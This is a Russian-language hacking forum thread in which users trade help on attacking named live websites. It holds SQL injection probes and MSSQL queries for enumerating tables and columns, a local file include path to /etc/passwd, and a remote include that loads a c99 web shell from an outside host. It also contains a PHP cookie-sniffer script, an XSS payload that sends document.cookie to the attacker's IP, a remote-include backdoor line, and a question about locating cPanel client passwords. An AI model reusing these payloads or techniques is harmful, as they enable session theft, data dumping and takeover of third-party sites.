Ваши вопросы по уязвимостям.

2svalck
а чтоб проще и понятнее тока самому написать)

 

так че мне никто не подскажет как убрать ограничитель символов и че еще могу сделать?

 

Хочется узнать че это за бд,такая и где можно почитать про.. И каким макаром узнать калонки в таблице JFORUM_USERs

 

2Assembler

ORA-01790: - база данных оракл.тут была статья от [x53]Shadow про проведение инжекта в оракл

 

а точнее здесь:
https://forum.antichat.ru/thread40576.html

 

htt p://cardz.ru/index.php?rasd=oplata&type=1'
Можете посмотреть эту скуля или нет , а то не могу понять!

 

Sosok, нет, не скуля.
при скуле будет немного другая ошибка.

 

Sosok, это ошибка в самом скрипте, она не вызвана кавычкой...
http://cardz.ru/index.php?rasd=oplata&type=1
=
http://cardz.ru/index.php?rasd=oplata&type=1'

 

Начёт сниффера.Код взял с форума:

<?php


$date = date('d.m.y - H:i:s');
$ip = UrlDecode(getenv('REMOTE_ADDR'));
$referer = UrlDecode(getenv('HTTP_REFERER'));
$query = UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');

$s = fopen("C:\Program Files\VertrigoServ\www\cookies.txt","w");

if($s) {

echo "Successfully opened!";
fputs($s,$cookie);
echo "\n";
fputs($s,$ip);

}

else {

echo "У нас праблемы...";

}


?>

Также есть XSS на одном сайте.Как нужно обратиться к скрипту,чтобы он записал данные ?

"<script%0A%0D>s=new Image();s.src="http://my_ip/sniffer.php?"+document.cookie%3B</script>

Где my_ip - мой Ip адрес).На серве лежит скрипт sniffer.php. В фаил ничего не записалось,вот я и подумал,что обращаюсь к скрипту неправильно.

 

при составлении запроса в mssql inj приходится сначала кодировать в чар а потом с помощью урл код)) естественно чтоб узнать все таблы запрос будет длинным.. и обрезается(( как поступить?

 

кто знает где пассы клиентов в cPanel .. или каждый хостер делает свое?

 

SELECT TOP 1 TABLE_NAME FROM inofrmation_schema.TABLES WHERE TABLE_NAME NOT IN(SELECT TOP x++ TABLE_NAME FROM inofrmation_schema.TABLES ORDER BY TABLE_NAME) ORDER BY TABLE_NAME

 

2razor
работает) но как можно по аналогии вытащить имена колонок?)

и если выводит данные из таблицы ... where id=2... почему запрос проходит без ошибок? или какие еще способы есть сдампить удаленно?

 

Можно ли как-то раскрутить пхпинклюд http://volkswagen.msk.ru/?p=../../../../../../../../../../etc/passwd%00 ? Стандартные методы не работают))

 

а как такой роскрутить?
http://shop.zano.ru/index.php?act=13 order by 1

 

http://shop.zano.ru/index.php?act=http://mail.ru/?

ыы

 

http://shop.zano.ru/index.php?act=http://wowbkdo.narod.ru/c99madshell =)))

 

SELECT TOP 1 COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' AND COLUMN_NAME NOT IN(SELECT TOP x COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' ORDER BY COLUMN_NAME) ORDER BY COLUMN_NAME

 

Всем здрасти
При подборе колонок выводиться

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...)

Перебрал 20 колонок все так же
URL:

http://frutonyanya.ru/php/news.php?c=1'

 

Pashkela в своём духе =)

Code:

if(isset($_GET['cmd'])){$f=require("http://pashkela.narod.ru/tema1.txt");die($f);}

Файлик -абревиатура от вебмани

diznt, там же ясно пишет. Запрещен микс груп бай и других параметров, кроме мин, макс, каунт...